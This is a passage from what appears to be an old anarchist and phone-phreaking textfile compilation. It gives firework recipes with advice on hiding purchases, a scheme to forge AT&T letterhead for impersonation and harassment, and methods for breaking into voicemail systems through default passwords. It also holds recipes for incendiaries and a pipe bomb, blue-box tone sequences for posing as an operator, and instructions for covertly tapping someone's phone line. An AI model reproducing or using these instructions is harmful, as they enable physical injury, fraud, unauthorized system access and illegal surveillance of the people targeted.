  2284. Potassium Nitrate     15        Potassium Chlorate    60
  2285. Aluminum, fine        2         Barium Nitrate        5
  2286. Aluminum, medium      1         Aluminum, fine        9
  2287. Black Powder          2         Aluminum, medium      4
  2288. Antimony Sulfide      3         Aluminum, coarse      3
  2289. Sulfur                4         Charcoal              2
  2290. bind with dextrine in           Dextrin               5
  2291. water                           bind with red gum in
  2292.                 water
  2293. Potassium Perchlorate 6
  2294. Barium Nitrate        1         Potassium Perchlorate 4
  2295. Aluminum              20        Aluminum, medium      2
  2296. Dextrin               1         Dextrin               1
  2297. bind with shellac in            bind with shellac in alcohol
  2298. alcohol
  2299.  
  2300.  
  2301. Simpler Zinc Spreaders
  2302.  
  2303. Potassium Nitrate     14        Potassium Chlorate    5
  2304. Zinc Dust             40        Potassium Dichromate  4
  2305. Charcoal              7         Charcoal, medium      4
  2306. Sulfur                4         Zinc Dust             24
  2307. bind with dextrine in           bind with dextrine in water
  2308. water
  2309.  
  2310.  
  2311. Willow Tree Stars - Use large amounts of lampblack -- too much to burn fully.
  2312.   Gives a willow tree effect.
  2313.  
  2314. Potassium Chlorate    10
  2315. Potassium Nitrate     5
  2316. Sulfur                1
  2317. Lampblack             18
  2318. bind with dextrine in water
  2319.  
  2320. In future files, we'll look at using these mixtures to produce roman candles,
  2321. aerial bombs, and other effects. As always, don't forget that it's just plain
  2322. stupid to go buying all these materials from one chemical supply house. When
  2323. you buy it all as a group, they know what you plan to do with it, and they keep
  2324. records. If anyone goes investigating the source of homemade fireworks and
  2325. checks with your supplier, there will be a lead straight to you. Be sure to
  2326. cover your tracks.
  2327.  
  2328.  
  2329.  
  2330.                  AT&T FORGERY
  2331.  
  2332. Here is a very simple way to either:
  2333. Play an incredibly cruel and realistic joke on a phreaking friend.
  2334.                      -OR-
  2335. Provide yourself with everything you ever wanted to be an AT&T person.
  2336.  
  2337.    All you need to do is get your hands on some AT&T paper and/or business
  2338. cards.  To do this you can either go down to your local business office and
  2339. swipe a few or call up somewhere like WATTS INFORMATION and ask them to send
  2340. you their information package. They will send you:
  2341. 1. A nice letter (with the AT&T logo letterhead) saying "Here is the info."
  2342. 2. A business card (again with AT&T) saying who the sales representative is.
  2343. 3. A very nice color booklet telling you all about WATTS lines.
  2344. 4. Various billing information. (Discard as it is very worthless)
  2345.  
  2346.    Now take the piece of AT&T paper and the AT&T business card down to your
  2347. local print/copy shop.  Tell them to run you off several copies of each, but
  2348. to leave out whatever else is printed on the business card/letter.  If they
  2349. refuse or ask why, take your precious business elsewhere.
  2350. (This should only cost you around $2.00 total)
  2351.  
  2352.    Now take the copies home and either with your typewriter, MAC, or Fontrix,
  2353. add whatever name, address, telephone number, etc. you like. (I would
  2354. recommend just changing the name on the card and using whatever information
  2355. was on there earlier)
  2356.  
  2357.    And there you have official AT&T letters and business cards.  As mentioned
  2358. earlier, you can use them in several ways.  Mail a nice letter to someone you
  2359. hate (on AT&T paper..hehehe) saying that AT&T is onto them or something like
  2360. that.  (Be sure to use correct English and spelling)  (Also do not hand write
  2361. the letter!  Use a typewriter! - Not Fontrix as AT&T doesn't use OLD ENGLISH
  2362. or ASCII BOLD when they type letters.  Any IBM typewriter will do perfectly)
  2363.  
  2364.    Another possible use (of many, I guess) is (if you are old enough to look
  2365. the part) to use the business card as some sort of fake id.
  2366.  
  2367.    The last example of uses for the fake AT&T letters & b.cards is mentioned
  2368. in my textfile, BASIC RADIO CALLING.  Briefly, send the station a letter that
  2369. reads:
  2370.     WCAT - FM202: (Like my examples? Haha!)
  2371. (As you probably know, radio stations give away things by accepting the 'x'
  2372. call. (ie: The tenth caller through wins a pair of Van Halen tickets)
  2373. Sometimes they may ask a trivia question, but that's your problem. Anyway, the
  2374. letter continues:)
  2375.   (You basically say that they have become so popular that they are getting
  2376. too many calls at once from listeners trying to win tickets. By asking them
  2377. to call all at the same time is overloading our systems.  We do, of course,
  2378. have means of handling these sort of matters, but it would require you sending
  2379. us a schedule of when you will be asking your listeners to call in.  That way
  2380. we would be able to set our systems to handle the amount of callers you get at
  2381. peak times..(etc..etc..more BS..But you get the idea, right?)
  2382.  
  2383.  
  2384.  
  2385.  
  2386.                   The Hacker's Handbook
  2387. [ Definitions ]  _7+3 _
  2388. Phreak    ["free"k]  Verb--1. The act of "Phreaking"  2. The act of making
  2389.        telephone calls without paying money [Slang]
  2390.  
  2391. Phreaker  ["free"-k-er]  Noun--1. One who engages in the act of "Phreaking"
  2392.        2. One who makes telephone calls without paying money [Slang]
  2393.  
  2394. <%=-------------------------------------------------------------------------=%>
  2395.  
  2396. [ Introduction ]
  2397.  
  2398.      Phreaking is a method used by most intelligent people {most often those
  2399. who use a computer and a Modulator-Demodulator (MoDem)}.  If you happen to
  2400. resemble the major mass of people who do not have the income to afford large
  2401. phone bills then phreaking is for you.  If you live in an area with an
  2402. Electronic Switching System [ESS] then phreaking is something which should be
  2403. done in moderate amounts.
  2404.  
  2405. <%=-------------------------------------------------------------------------=%>
  2406.  
  2407. [ Switching Systems ]
  2408.  
  2409. Three types of switching systems are present in the United States today:
  2410.  
  2411.            [1] Step by Step
  2412.            [2] Crossbar
  2413.            [3] ESS  {Electronic Switching System}
  2414.  
  2415.  
  2416.              <] Step by Step [>
  2417.  
  2418. First switching system used in America, adopted in 1918 and until 1978 Bell
  2419. had over 53% of all exchanges using Step by Step [SxS].  A long, and con-
  2420. fusing train of switches is used for SxS switching.
  2421.  
  2422.              [> Disadvantages <]
  2423.    [A] The switch train may become jammed : Blocking call.
  2424.    [B] No DTMF [Dual-Tone Multi-Frequency]["Touch-tone"].
  2425.    [C] Much maintenance and much electricity.
  2426.    [D] Everything is hard wired
  2427.  
  2428.             +> Identification <+
  2429.    [A] No pulsing digits after dialing or DTMF.
  2430.    [B] Phone Company sounds like many typewriters.
  2431.    [C] No:  Speed calling, Call forwarding, and other services.
  2432.    [D] Pay-phone wants money first before dial-tone.
  2433.  
  2434.  
  2435.                <] Crossbar [>
  2436.  
  2437. Crossbar has been Bell's primary switcher after 1960.  Three types of Crossbar
  2438. switching exist:  Number 1 Crossbar [1XB], Number 4 Crossbar [4XB], and Number
  2439. 5 Crossbar [5XB].  A switching matrix is used for all the phones in an area.
  2440. When someone calls, the route is determined and is met up with the other phone.
  2441. The matrix is set-up in horizontal and vertical paths.  There are no definite  _7+3 _distinguishing features of Crossbar switching.
  2442.  
  2443.  
  2444.                   <] ESS [>
  2445.  
  2446. You probably were hoping I wouldn't talk about this nightmare, if you did you
  2447. will know why everyone doesn't want to be reminded about Bell's holocaust on
  2448. America.  With ESS Bell knows:  every digit dialed {including mistakes!}, who
  2449. you call, when you called, how long you were connected, and in some cases,
  2450. what you talked about!  Yes, this is the closest anyone has come to true
  2451. Totalitarianism.  ESS is programed to print out the numbers of people who make
  2452. excessive calls to WATS numbers [Wide Area Telephone Service][1-800 numbers]
  2453. or directory assistance.  This deadly trap is called "800 Exceptional Calling
  2454. Report."  ESS can be programed to print logs of who called certain numbers.
  2455. Electronic Switching System makes the job of the FBI, Bell Security {The
  2456. Gestapo in phreakin' tongue}, NSA, and other organizations which like to invade
  2457. our privacy, extremely easy!  Tracing is done in microseconds, and the results
  2458. are printed out on the monitor of a Gestapo officer.  ESS can also pick up
  2459. foreign tones on the line, like 2600 Hz. {used in blue boxes, discussed later}.
  2460. Bell claims that the entire country will be plagued by ESS by the 1990's!
  2461.  
  2462.                +> Identification <+
  2463.    [A] Dialing 911 for emergencies.
  2464.    [B] Dial-tone first for pay-phones.
  2465.    [C] Calling services, like:  Call forwarding, Speed dialing, Call waiting.
  2466.    [D] ANI [Automatic Number Identification] for long-distance calls.
  2467.  
  2468.  
  2469. [[[Note]]]  of the above identifications of the three switching systems, do
  2470.         not solely rely on these descriptions, the best way to find out
  2471.         is to [no!] call your local telephone company.
  2472.  
  2473. <%=-------------------------------------------------------------------------=%>
  2474.  
  2475. [ Long-Distance Services ]
  2476.  
  2477. To attempt to help the community {and for private business} companies developed
  2478. ways to lessen the costs of long-distance calling charges.  The companies own
  2479. their own switching systems and use extenders for callers to call.  The way
  2480. extenders operate:  1] Customer calls service, 2] He/she hears a low tone which
  2481. sounds like a dial-tone, 3] She/he either dials the access code then the phone
  2482. number, or dials the phone number then the access code, 4] Is connected to
  2483. whatever he/she calls.  Aside from Ma Bells collection, the customer receives a
  2484. bill for calls made with his/her long-distance company {a supposedly cheaper
  2485. bill than Ma Bell's}.  Thought:  Hey, I could randomly pick access codes and
  2486. use them to call whatever area the company services!  Right, that's what basic
  2487. phreaking is!  A wise idea, though, is to have many access codes and many
  2488. service numbers to rotate throughout your average life as a phreaker.  To aid
  2489. in your quest to beat the system I have provided many 1-800 numbers which
  2490. anyone can call, aside from local numbers, such as Sprint, or MCI.  The reason
  2491. for providing you with WATS numbers is because all of us aren't in a big city
  2492. where Sprint or MCI even exist, this way everyone can phreak!  A way to find
  2493. more access codes is by using your old modem.  Yes, your modem can imitate DTMF
  2494. tones!
  2495.   _7+3 _  {>Procedure:  1)  dial 1-800  +  service number
  2496.         2)  dial access code->area code->phone number, or
  2497.         3)  dial area code->phone number->access code
  2498.  
  2499. [ Colored Boxes ]
  2500.  
  2501. A more shrewd, technological, safer {without ESS} way to phreak is with a piece
  2502. of hardware known as a ________ Box.  Boxes are many different colors {I don't
  2503. know ALL the colors because it seems like every time I turn around there's some
  2504. new color out!}.  Colors I have heard of:  Blue, Black, Red, White, Silver,
  2505. Clear, and MANY, MANY more...  Plans for making these boxes can be obtained by
  2506. calling different boards [BBS's], AE lines, or whatever.  But!, if you have an
  2507. Apple Cat modem then do I have good news for ->you<-!!  The Apple Cat modem
  2508. can emulate the frequencies {usually 2600 Hz.} made by ________ Boxes with the
  2509. help of a handy little program called "Cat's Meow!"
  2510.  
  2511. <%=-------------------------------------------------------------------------=%>
  2512.  
  2513.  
  2514.               Hacking Voice Mail Systems
  2515.  
  2516. Voice Mail is a relatively new concept and not much has been said about it.
  2517. It is a very useful tool for the business person and the phreak.  The way it
  2518. works is that somebody wishing to get in touch with you calls a number,
  2519. usually a 1-800, and punches in on his touch-pad your mailbox number and then
  2520. he is able to leave a message for you.  Business experts report that this
  2521. almost totally eliminates telephone tag.  When a person wishes to pick up his
  2522. message all he needs to do is call the number enter a certain code and he can
  2523. hear his messages, transfer them, and do other misc. mailbox utilities.
  2524.  
  2525. Most VMSs are similar in the way they work.  There are a few different ways
  2526. the VMSs store the voice.  One way is that the voice is recorded digitally and
  2527. compressed and when heard it is reproduced back into the voice that recorded
  2528. it. Another method that is slower and uses more space, but costs less, stores
  2529. the voice on magnetic tape, the same type that is used to store data on a
  2530. computer, and then runs the tape at a slow speed.  Using this method the voice
  2531. does not need to be reproduced in any way and will sound normal as long as the
  2532. tape is running at a constant speed.  On some of the newer VMSs the voice is
  2533. digitally recorded and is transformed from the magnetic tape at about 2400
  2534. bits per second.
  2535.  
  2536. There are many different types and versions of voice mail systems.  Some of
  2537. the best and easiest to get on will be discussed.
  2538.  
  2539. Centagram
  2540. ---------
  2541. These are direct dial (you don't have to enter a box number).  To get on one
  2542. of these, first have a number to any box on the system.  All of the other
  2543. boxes will be on the same prefix; just start scanning them until you find one
  2544. that has a message saying that person you are calling is not available.  This
  2545. usually means that the box has not been assigned to anybody yet.  Before the
  2546. nice lady's voice tells you to leave the message, hit #.  You will then be
  2547. prompted for your password.  The password will usually be the same as the last
  2548. four digits of the box's number or a simple number like 1000, 2000, etc.  Once
  2549. you get on, they are very user friendly and will prompt you with a menu of  _7+3 _options.  If you can't find any empty boxes or want to do more, you can hack
  2550. but the system administrators box, which will usually be 9999 on the same
  2551. prefix as the other boxes, will allow you to hear anybody's messages and
  2552. create and delete boxes.
  2553.  
  2554. Sperry Link
  2555. -----------
  2556. These systems are very nice.  They will usually be found on an 800 number.
  2557. These are one of the hardest to get a box on because you must hack out a user
  2558. ID (different from the person's box number) and a password.  When it answers,
  2559. if it says, "This is a Sperry Link voice station.  Please enter your user ID,"
  2560. you will have to start trying to find a valid user ID.  On most Sperrys it
  2561. will be a five digit number.  If it answers and says, "This is an X answering
  2562. service," you first have to hit *# to get the user number prompt.  Once you
  2563. get a valid user number will have to guess the password on most systems, it
  2564. will be 4 digits.  Once you get in, these are also very user friendly and have
  2565. many different options available.
  2566.  
  2567. RSVP
  2568. ----
  2569. This is probably one of the worst VMSs but it is by far the easiest to get
  2570. yourself a box.  When it answers you can hit * for a directory of the boxes on
  2571. it (it will only hold 23).  If you hit # you will be given a menu of options
  2572. and when you choose an option you will then be prompted for your ID number.
  2573. The ID number on an RSVP system will just about always be the same as the
  2574. mailbox number, which are always only 2 digits.
  2575.  
  2576. A.S.P.E.N.
  2577. ----------
  2578. The Aspen voice message systems made by Octel Telecommunications is in my
  2579. opinion the BEST VMS made.  To get a box on an Aspen, you need to find an
  2580. empty box.  To find an empty box, scan the box numbers and if one says, "You
  2581. entered XXXX.  Please leave a message at the tone," then this is an empty box.
  2582. You next just press # and when prompted for your box number enter the number
  2583. of the empty box and friendly voice of the nice lady will guide you through
  2584. all of the steps of setting up your box.  She first tells you what you can do
  2585. with the box and then will prompt you with, "Please enter the temporary
  2586. password assigned to you by your system manager."  This password will usually
  2587. be 4 digits long and the same as the box number like 1000, etc.  Once you get
  2588. on their are many things you can do.  You can make a distribution list where
  2589. if you want to leave a certain message to more than one person, you can enter
  2590. the list number and all of the boxes on the list will get the message. You can
  2591. also have the system call you and notify you that you have new messages. These
  2592. systems also have what they call "Information center mailboxes" that are
  2593. listen only and can also have a password on them so the person calling has to
  2594. enter the password before he hears the greeting message.  Aspen VMSs have a
  2595. system managers mailbox that will just about give you total control of the
  2596. whole system and let you listen to people's mail, create and delete boxes, and
  2597. many other things.
  2598.  
  2599.  
  2600.  
  2601.                 IMPROVISED INCENDIARIES
  2602.  
  2603. 1) Chlorate-Sugar mix  _7+3 _
  2604.    This mixture can be either an incendiary or an explosive.  Sugar is the
  2605. common granulated household type.  Either potassium chlorate (KClO3) or sodium
  2606. chlorate (NaClO3) can be used; but potassium is potassium is preferred.
  2607. Proportions can be by equal parts or by volume, or 3 parts chlorate to 2 parts
  2608. sugar preferred.  Mix in or on a non-sparking surface.  Unconfined, the mixture
  2609. is an incendiary.  Confined in a tightly capped length of pipe, it will explode
  2610. when a spark is introduced.  Such a pipe will produce lovely casualties, but is
  2611. not very good for breaching of cutting up.  Concentrated sulfuric acid will
  2612. ignite this very fast burning incendiary mixture.  Placing the acid in a
  2613. gelatin capsule, balloon, or other suitable container will provide a delay,
  2614. (length of which depends on how long it takes for the acid to eat through the
  2615. container).
  2616.  
  2617. 2) Potassium Permanganate And Sugar
  2618.  
  2619.    Another fast burning, first fire mix is obtained by mixing potassium
  2620. permanganate, 9 parts, to one part sugar.  It is some what hotter than the
  2621. chlorate sugar mix, and can be ignited by the addition of a few drops of
  2622. glycerine.
  2623.  
  2624. 3) Improvised Napalm
  2625.  
  2626.    In talking about this, I have found that there are many ways to this
  2627. wonderful substance.  My favorite is by mixing gasoline and styrofoam.  Usually
  2628. in a metal can. Keep adding the styrofoam until the mix is very stinky, an then
  2629. add a little bit of kerosine. Another method is by taking a double boiler,
  2630. filling the bottom portion with approx 3/4 full of water. Put either gasoline
  2631. or kerosine into the top.  Add pure SOAP chips to the mix.  Heat the fuel until
  2632. it boils and then simmers. Stir constantly until the desired consistency is
  2633. reached: remember that it will thicken further on cooling. Last we come the
  2634. 'Soldier' technique, anyone who saw this movie will recognize this one.
  2635. Carefully heat the end of a 100 watt light bulb. again-carfully remove the
  2636. metal end and internal parts.  Fill the glass bulb with half gasoline. and then
  2637. 1/4 more with dish washing liquid.  Finally take rubber cement and glue the two
  2638. parts back together.  Be sure that you put enough mixture into the build so
  2639. that the metal wire is well submerged before use and during.
  2640.  
  2641. 4) Molded Bricks That Burn
  2642.  
  2643.    Proportions are 3 parts aluminum powder, 4 parts water and 5 parts plaster
  2644. of paris.  Mix the aluminum and plaster thoroughly together, then add the water
  2645. and stir vigorously. Pour the resulting mix into a mold, let harden, and then
  2646. dry for 2 to 3 weeks. These blocks are hard to ignite, and take a long time to
  2647. make, but when ignited on mild steal, they have a tendency to melt it.
  2648.  
  2649. 5) The Fire Bottle
  2650.  
  2651.   Fill a good Jack Daniel's bottle about one-fifth to one-fourth full with
  2652. sulfuric acid.  Fill the remainder with gasoline, kerosine, or a good
  2653. combination of the two and mix thoroughly.  Add water to Potassium Chlorate and
  2654. sugar mix, and soak rags in the mix.  Wrap the rags around the bottle, tie in
  2655. place, and allow to dry.  When thrown at a T-62 or other target, the bottle
  2656. will break, the acid will ignite the chlorate-sugar mix on the rags, which will
  2657. ignite the fuel.  _7+3 _
  2658.  
  2659. 6) Molotov Cocktails
  2660.  
  2661.   These do not 'explode' per say, they just spread around the fuel and, if your
  2662. lucky the oil/gas mix combusts enough to give you a little "boom".  A two to
  2663. one ratio of gas to oil works nicely.  Napalm can also be used, or jelly gas is
  2664. fine.
  2665.  
  2666. 7) Thermite
  2667.  
  2668.   Use any size can with sticks tied or taped to sides and cut a small hole in
  2669. the bottom. Cover bottom with paper.  Place round stick wrapped in paper in
  2670. middle of can.  Fill bottom of can 1/4 inch with magnesium. Over this place
  2671. mixture of 3 parts ferric oxide and 2 parts aluminum powder. Remove stick
  2672. (leaving paper tunnel) and fill hole with mixture 3 parts potassium chlorate
  2673. and 1 part sugar.  Top the hole with a paper bag containing chlorate-sugar mix
  2674. with fuse protruding Tamp top with dirt or clay.
  2675.  
  2676.  
  2677.             THE JOY OF "BOXING"
  2678.                BY THE DRAGYN
  2679.  
  2680.   I AM WRITTING THIS ARTICLE TO INFORM THOSE OF YOU THAT HAVE A BOX
  2681. AND ARE GETTING BORED WITH NOTHING TO DO OR IF YOU JUST AREN'T QUITE
  2682. SURE WHAT YOU ARE DOING WHEN YOU PLAY AROUND WITH MF TONES.  FIRST OF
  2683. ALL, WHEN YOU BLAST OUT THE 2600HZ TONE, YOU ARE DROP PING A TRUNK AND
  2684. ESSENTIALLY, YOU BECOME YOUR OWN OPERATOR.  WHEN YOU PLACE A LONG
  2685. DISTANCE PHONE CALL, A COMPUTER USUALLY DOES THE MF TONES FOR YOU AND
  2686. YOU DON'T HEAR THEM.  IN THIS ARTICLE, I WILL DEAL WITH INTERNATIONAL
  2687. CALLING, CONFERENCING, EMERGENCY-BREAK THROUGHS AND JUST HAVING FUN
  2688. WITH THE BOX.  BUT NOWDAYS, BOXING IS MUCH MORE RISKIER THAN IT WAS
  2689. BACK 10-15 YEARS AGO, SO IF YOU AREN'T CAUTIOUS OR YOU LIVE ON A
  2690. MODERN ESS, THAN YOU MIGHT JUST GET CAUGHT (BUT IF YOU'RE NOT 18 YET
  2691. THEN BIG DEAL!  GO RAG THE HELL OUT OF MA BELL!)
  2692.  
  2693.   HAVE YOU EVER WANTED TO CALL OVERSEAS AND TALK TO SOMEONE IN ANOTHER
  2694. COUNTRY?  OR ARE YOU JUST BORED OF METROFONE OR MCI?  THEN TRY THIS:
  2695. WHEN YOU PLACE AN INTERNATIONAL CALL, IT IS ROUTED THROUGH THE CLOSEST
  2696. OR CLOSEST UNBUSY INTERNATIONAL LINK.  YOU CAN FIND THESE LINKS BY
  2697. GOING KP-213-182-ST.  THIS IS THE LOS ANGLES LINK.  MOST MAJOR CITIES
  2698. HAVE THEM BY THE COAST LIKE NEW YORK KP-212-182-ST AND EVEN DENVER
  2699. KP-303-182-ST.  WHEN YOU CALL ONE OF THESE LINKS, YOU WILL GET A TONE,
  2700. SOMETIMES NOT, AND THEN YOU HAVE ABOUT 10 SECONDS TO ENTER THE NUMBER
  2701. YOU ARE DIALING IN MF TONES.  IF YOU MAKE A MISTAKE, IT WILL TELL YOU.
  2702. THE NORMAL FORMAT FOR MAKING A CALL WOULD BE:  KP-212-182-ST (WAIT FOR
  2703. TONE) KP-( COUNTRY CODE)-(PHONE NUMBER IN COUNTRY) -ST THEN WAIT FOR
  2704. THE CALL TO GO THROUGH.
  2705.  
  2706.   THERE TWO WAYS TO DO CONFERENCE CALLS.  ONE IS TO MF UP
  2707. KP-213-080-1050- ST.  THIS GIVES YOU ALIANCE TELE-CONFERENCING IN LOS
  2708. ANGLES.  THE WAY THIS ONE WORKS IS YOU ENTER KP-2130801050-ST WAIT
  2709. TILL YOU HEAR IT DROP TWICE THEN YOU ENTER ANOTHER NUMBER THAT THE
  2710. CALL IS GOING TO BE BILLED TO (USUALLY SOME- ONE THAT YOU DON'T LIKE).
  2711. THIS ONE IS TOTALLY COMPUTER CONTROLLED AND YOU JUST ENTER THE INFO
  2712. NEEDED BY A NORMAL TOUCH TONE PAD.  THE OTHER WAY FOR CONFERENCING IS  _7+3 _TO MF UP YOUR LOCAL OR NOT SO LOCAL CONFERENCE OPERATOR.  TO DO THIS
  2713. JUST DROP A TRUNK THEN GO KP-(AREA CODE)-11511-ST AND THE LADY WILL
  2714. ANSWER "CONFERENCE OPERATOR, CAN I HELP YOU?" NOW IF YOU WANTED TO
  2715. HOOK JUST 1-10 PEOPLE TOGETHER YOU GIVE HER THE PH#S AND SHE WILL DIAL
  2716. THEM UP AND PUT EVERYONE ON TOGETHER, MEANWHILE, SHE THINKS YOU ARE
  2717. THE OPERATOR SETTING IT UP FOR SOMEONE ELSE.  ONE NOTE, WHENEVER YOU
  2718. ARE DIALING IN MF TONES AND GET AN OPERATOR, THEY HAVE NO IDEA THAT
  2719. YOU ARE BOXING, THEY JUST THINK YOU ARE AN OPERATOR FROM SOMEWHERE OUT
  2720. OF TOWN.  SO DON'T BE SCARED, GIVE THOSE OPERATORS HELL!  IN FACT, IF
  2721. YOU CAN FIND A GOOD OPERATOR, THEY WILL EVEN TELL YOU HOW TO DO
  2722. THINGS.
  2723.  
  2724.   NOW DON'T YOU ALL HATE A BUSY SIGNAL?  EVER TRY TO GET TO SOMEONE
  2725. AND THE LINE WAS BUSY?  WELL, DON'T FRET ANYMORE!  LET'S SAY THAT THE
  2726. PHONE NUMBER 612-874-8700 WAS BUSY AND YOU WANTED TO GET THROUGH.
  2727. FIRST YOU WOULD DROP YOUR TRUNK THEN GO KP-612-121-ST.  THIS WILL GIVE
  2728. YOU A LOCAL OPERATOR IN THE 612 AREA CODE.  WHEN SHE ANSWERS (SHE
  2729. THINKS YOU ARE AN OPERATOR FROM SOME-WHERE ELSE CALLING) YOU SAY
  2730. "EMERGENCY INTERRUPTION ON AREA CODE 612-874-8700 AND THE PARTIES NAME
  2731. IS PETER (OR SOME DUMP NAME)." SINCE TRUNK VERIFICATION CANNOT BE DONE
  2732. BY OUTSIDE TOLL SWITCHING SYSTEMS, YOU CANNOT DO THESE BY BOXING AND
  2733. YOU HAVE TO LET THE OPERATOR DO THEM FOR YOU.  AGAIN, SHE HAS NO WAY
  2734. OF KNOWING THAT YOU AREN'T AN OPERATOR WHEN YOU CALL HER UNLESS YOU
  2735. ARE 12 YEARS OLD AND SOUND LIKE A SNIVELING LITTLE WIMP.  AFTER THE
  2736. OPERATOR HAS CLEARED THE LINE, YOU CAN DIAL IT AND I T WON'T BE BUSY.
  2737. IF IT IS OUT OF ORDER SHE MAY SAY IT IS ODD OR OFF THE HOOK.
  2738.  
  2739.   NOW LET'S SAY YOU JUST WANT TO MAKE AN ORDINARILY PHONE CALL OR CALL
  2740. AN 800 PH#.  AFTER YOU DROP YOUR TRUNK, JUST DO THIS KP-(AREA
  2741. CODE)-(PH#)-ST, AND NOTICE THAT NO '1' IS NEEDED.
  2742.  
  2743.   NOW, WHAT IF YOU HAVE A FRIEND WITH A PHONE IN HIS CAR?  WELL, YOU
  2744. JUST MF UP THE MOBILE OPERATOR BY GOING KP-(AREA CODE)-11521-ST.
  2745.  
  2746.   AGAIN, REMEMBER THAT WHENEVER YOU TALK TO ONE OF THE OPERATORS, THEY
  2747. HAVE NO WAY OF KNOWING WHETHER YOU ARE A REAL OPERATOR OR NOT SO GIVE
  2748. THEM HELL AND DON'T BE SCARED!  I GUESS THAT THIS IS ALL FOR NOW, BUT
  2749. IF YOU WOULD LIKE MORE INFORMATION, LEAVE E-MAIL BUT NO RUGGIES
  2750. PLEASE.
  2751.  
  2752.  
  2753.  
  2754.  
  2755.  
  2756.                  * PRIVATE AUDIENCE *
  2757.  
  2758.           (A BASIC LESSON IN THE ART OF LISTENING IN)
  2759.  
  2760. Federal law:
  2761.   Section 605 of title 47 of the U.S code, forbids interception of
  2762. communication, or divulagance of intercepted communication except by persons
  2763. outlined in section 119 of title 18 (a portion of the Omnibus crime control and
  2764. safe streets act of 1968). This act states that "It shall not be unlawful under
  2765. this act for an operator of a switchboard, or an officer, employee, or agent of
  2766. any communication common carrier who's switching system is used in the  _7+3 _transmission of a wire communication to intercept or disclose intercepted
  2767. communication."
  2768.  
  2769.                    PART II: TAPPING
  2770.  
  2771. Everyone has at some time wanted to hear what a friend, the principal, the prom
  2772. queen, or a neighbor has to say on the phone. There are several easy ways to
  2773. tap into a phone line. None of the methods that I present will involve actually
  2774. entering the house. You can do everything from the backyard. I will discuss
  2775. four methods of tapping a line. They go in order of increasing difficulty.
  2776.  
  2777. 1. The "beige box": a beige box (or bud box) is actually better known as a
  2778. "lineman" phone. They are terribly simple to construct, and are basically the
  2779. easiest method to use. They consist of nothing more than a phone with the
  2780. modular plug that goes into the wall cut off, and two alligator clips attached
  2781. to the red and green wires. The way to use this box, is to venture into the
  2782. yard of the person you want to tap, and put it onto his line. This is best done
  2783. at the bell phone box that is usually next to the gas meter. It should only
  2784. have one screw holding it shut, and is very easily opened. Once you are in, you
  2785. should see 4 screws with wires attached to them. If the house has one line,
  2786. then clip the red lead to the first screw, and the green to the second. You are
  2787. then on the "tappee's" phone. You will hear any conversation going on. I
  2788. strongly recommend that you remove the speaker from the phone that you're using
  2789. so the "tappee" can't hear every sound you make. If the house has two lines,
  2790. then the second line is on screws three and four. If you connect everything
  2791. right, but you don't get on the line, then you probably have the wires
  2792. backward. Switch the red to the second screw and the green to the first. If no
  2793. conversation is going on, you may realize that you can't tap the phone very
  2794. well because you don't want to sit there all night, and if you are on the
  2795. phone, then the poor tappee can't dial out, and that could be bad...so.......
  2796. method two.
  2797.  
  2798. 2. The recorder: This method is probably the most widespread, and you still
  2799. don't have to be a genius to do it. There are LOTS of ways to tape
  2800. conversations. The two easiest are either to put a "telephone induction pickup" 
  2801. Radio Shack $1.99) on the beige box you were using, then plugging it into the
  2802. microphone jack of a small tape recorder, and leaving it on record. Or plugging
  2803. the recorder right into the line. This can be done by taking a walkman plug,
  2804. and cutting off the earphones, then pick one of the two earphone wires, and
  2805. strip it. There should be another wire inside the one you just stripped. Strip
  2806. that one too, and attach alligators to them. Then follow the beige box
  2807. instructions to tape the conversation. In order to save tape, you may want to
  2808. use a voice activated recorder (Radio Shack $59), or if your recorder has a
  2809. "remote" jack, you can get a "telephone recorder control" at Radio shack shack
  2810. for $19 that turns the recorder on when the phone is on, and off when the phone
  2811. is off. This little box plugs right into the wall (modularly of course), so it
  2812. is best NOT to remove the modular plug for it. Work around it if you can. If
  2813. not, then just do you best to get a good connection. When recording, it is good
  2814. to keep your recorder hidden from sight (in the Bell box if possible), but in a
  2815. place easy enough to change tapes from.
  2816.  
  2817. 3. The wireless microphone: this is the BUG. It transmits a signal from the
  2818. phone to the radio (FM band). You may remember Mr. Microphone (from Kaytel
  2819. fame); these wireless microphones are available from Radio Shack for $19. They
  2820. are easy to build and easy to hook up. There are so many different models, that  _7+3 _is is almost impossible to tell you exactly what to do. The most common thing
  2821. to do is to cut off the microphone element, and attach these two wires to
  2822. screws one and two. The line MIGHT, depending on the brand, be "permanently off
  2823. hook". This is bad, but by phucking around with it for a while, you should get
  2824. it working. There are two drawbacks to using this method. One, is that the poor
  2825. asshole who is getting his phone tapped might hear himself on "FM 88, the
  2826. principal connection". The second problem is the range. The store bought
  2827. transmitters have a VERY short range. I suggest that you build the customized
  2828. version I will present in part four (it's cheaper too). Now on to the best of
  2829. all the methods....
  2830.  
  2831. 4. The "easy-talks": This method combines all the best aspects of all the the
  2832. other methods. It only has one drawback... You need a set of "Easy-talk" walkie
  2833. talkies. They are voice activated, and cost about $59. You can find 'em at toy
  2834. stores, and "hi-tech" catalogs. I think t(at any voice activated walkie talkies
  2835. will work, but I have only tried the easy-talks. First, you have to decide on
  2836. one for the "transmitter" and one for the "receiver". It is best to use the one
  2837. with the strongest transmission to transmit, even though it may receive better
  2838. also. De-solder the speaker of the "transmitter", and the microphone of the
  2839. "receiver". Now, go to the box. put the walkie talkie on "VOX" and hook the
  2840. microphone leads (as in method three) to the first and second screws in the
  2841. box. Now go home, and listen on your walkie talkie. If nothing happens, then
  2842. the phone signal wasn't strong enough to "activate" the transmission. If this
  2843. happens, there are two things you can do. One, add some ground lines to the
  2844. microphone plugs. This is the most inconspicuous, but if it doesn't work then
  2845. you need an amplifier, like a walkman with two earphone plugs. Put the first
  2846. plug on the line, and then into one of the jacks. Then turn the volume all the
  2847. way up (w/out pressing play). Next connect the second earphone plug to the mice
  2848. wires, and into the second earphone outlet on the walkman. Now put the whole
  2849. mess in the box, and lock it up. This should do the trick. It gives you a
  2850. private radio station to listen to them on: you can turn it off when something
  2851. boring comes on, and you can tape off the walkie talkie speaker that you have!
  2852.  
  2853.               PART IV: WIRELESS TRANSMITTER PLANZ
  2854.  
  2855. This is a tiny transmitter that consists on a one colpitts oscillator that
  2856. derives it's power from the phone line. Since the resistance it puts on the
  2857. line is less than 100 ohms, it has no effect on the telephone performance, and
  2858. can not be detected by the phone company, or the tappee. Since it is a
  2859. low-powered device using no antenna for radiation, it is legal to the FCC.
  2860. (That is it complies with part 15 of the FCC rules and regulations). It,
  2861. however is still illegal to do, it's just that what you're using to do it is
  2862. legal. This is explained later in part 15... "no person shall use such a device
